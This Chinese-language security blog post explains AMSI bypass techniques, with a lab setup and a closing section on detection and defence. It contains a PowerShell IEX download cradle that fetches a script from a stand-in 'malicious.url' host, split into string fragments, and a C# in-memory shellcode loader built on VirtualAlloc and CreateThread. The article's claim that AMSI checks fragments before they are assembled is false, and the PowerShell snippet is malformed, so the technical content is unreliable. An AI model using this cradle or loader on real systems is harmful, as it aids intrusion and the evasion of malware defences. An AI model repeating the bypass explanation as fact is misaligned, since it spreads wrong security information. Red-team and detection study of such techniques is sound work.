AMSI绕过方法详解：实战与技巧

一、反弹思维：从AMSI检测到绕过

有一次，我在甲方安全团队工作时，遇到了一个有趣的问题。我们在内部网络布置了一套完整的检测系统，重点关注恶意软件的活动。AMSI（Antimalware Scan Interface）一直以来都是我们的得力助手，它能拦截并分析脚本语言中的恶意行为。然而，在模拟对抗中，我们发现了一些攻击者的“聪明招数”，他们能巧妙绕过AMSI的检测。

AMSI的工作原理实际上很简单：它会钩住脚本引擎的执行过程，并在脚本运行之前通过注册的反恶意软件扫描引擎进行检测。如果脚本包含恶意行为，AMSI就会发出警告。然而，攻击者总能设法避开这一机制。

二、实战环境搭建：搭建一个挑战平台

为了更好地探究AMSI绕过技术，我决定搭建一个测试环境。这个环境包括一台运行Windows 10的虚拟机，安装了最新版本的PowerShell和具备AMSI功能的反恶意软件软件。我们要在这个环境中模拟攻击者的视角，查看如何绕过AMSI。

环境准备：

1. 操作系统：Windows 10（更新至最新补丁）
2. 工具：PowerShell、Python
3. 软件：安装Windows Defender或其他支持AMSI的反恶意软件
4. 编辑器：Visual Studio Code或其他代码编辑器

在搭建环境时，我还专门设置了一个网络隔离，确保测试不会影响其他系统。

三、Payload构造的艺术：绕过AMSI的技术原理

绕过AMSI的方法可以说是见招拆招。攻击者通常会利用代码混淆、内存操作等手段改变脚本执行的方式，从而避开AMSI的扫描。

方法一：字符串混淆

有一次，我测试了一种字符串混淆技术，通过动态生成恶意代码，以避开AMSI的检测。具体步骤如下：

1. 将恶意代码分割成多个字符串片段。
2. 使用字符串连接或解码函数，动态生成完整代码。
3. 通过Invoke-Expression执行生成的代码。

<pre><code class="language-powershell">$part1 = &quot;IEX (New-Object Net.WebClient).DownloadString(&#039;http&quot; $part2 = &quot;://malicious.url/script.ps1&#039;)&quot; Invoke-Expression ($part1 + $part2)</code></pre>

这样做，AMSI会在代码片段被组装之前进行检查，因此无法识别出其中的恶意行为。

方法二：内存加载

另一个流行的绕过技巧是将恶意代码加载到内存中，并从内存中直接执行。这样可以绕过文件系统的监控，也减少了AMSI的触发条件。

<pre><code class="language-csharp">using System; using System.Reflection; using System.Runtime.InteropServices;

class Program { public static void Main() { byte[] myPayload = new byte[] { / shellcode bytes here / }; IntPtr allocMemAddress = VirtualAlloc(IntPtr.Zero, (UIntPtr)myPayload.Length, 0x1000, 0x40); Marshal.Copy(myPayload, 0, allocMemAddress, myPayload.Length); IntPtr hThread = CreateThread(IntPtr.Zero, 0, allocMemAddress, IntPtr.Zero, 0, IntPtr.Zero); WaitForSingleObject(hThread, 0xFFFFFFFF); }

[DllImport(&quot;kernel32.dll&quot;)] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, UIntPtr dwSize, uint flAllocationType, uint flProtect);

[DllImport(&quot;kernel32.dll&quot;)] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

[DllImport(&quot;kernel32.dll&quot;)] public static extern uint WaitForSingleObject(IntPtr hHandle, uint dwMilliseconds); }</code></pre>

这样做可以直接在内存中操作，并执行Payload，不会触发AMSI的文件系统检查。

四、流量捕获实战：检测与防御策略

从防御角度来看，检测这些绕过技术需要更高级的策略。常规的文件扫描可能失效，因此我们需要关注脚本行为和内存活动。

检测技巧：

1. 行为分析：通过监控PowerShell的命令参数与执行模式，识别典型的Payload执行行为。
2. 内存监控：使用内存分析工具检查可疑的内存分配与线程活动。
3. 网络流量分析：监控网络流量，识别可疑的下载活动，并检查是否来自已知恶意来源。

这些方法结合使用，可以有效提升对恶意活动的检测能力。

五、经验教训分享：对抗中的智慧

在这次实践中，我总结出几点经验与教训。作为防御方，我们需要不断更新检测策略，跟上攻击者的步伐。而作为攻击者，要不断研究和尝试新技术，以突破现有防御。

分享几点：

1. 持续学习：安全技术日新月异，无论是攻击者还是防御者，都要保持学习的态度。
2. 模拟演练：定期进行红蓝对抗演练，可以快速发现防御系统的弱点。
3. 合作交流：与其他安全团队合作，共享经验与技术，能够有效提升整体安全水平。

这篇文章仅供合法授权的安全测试与研究使用，希望对安全研究人员有所帮助。保持警惕与好奇心，才能在这个领域游刃有余。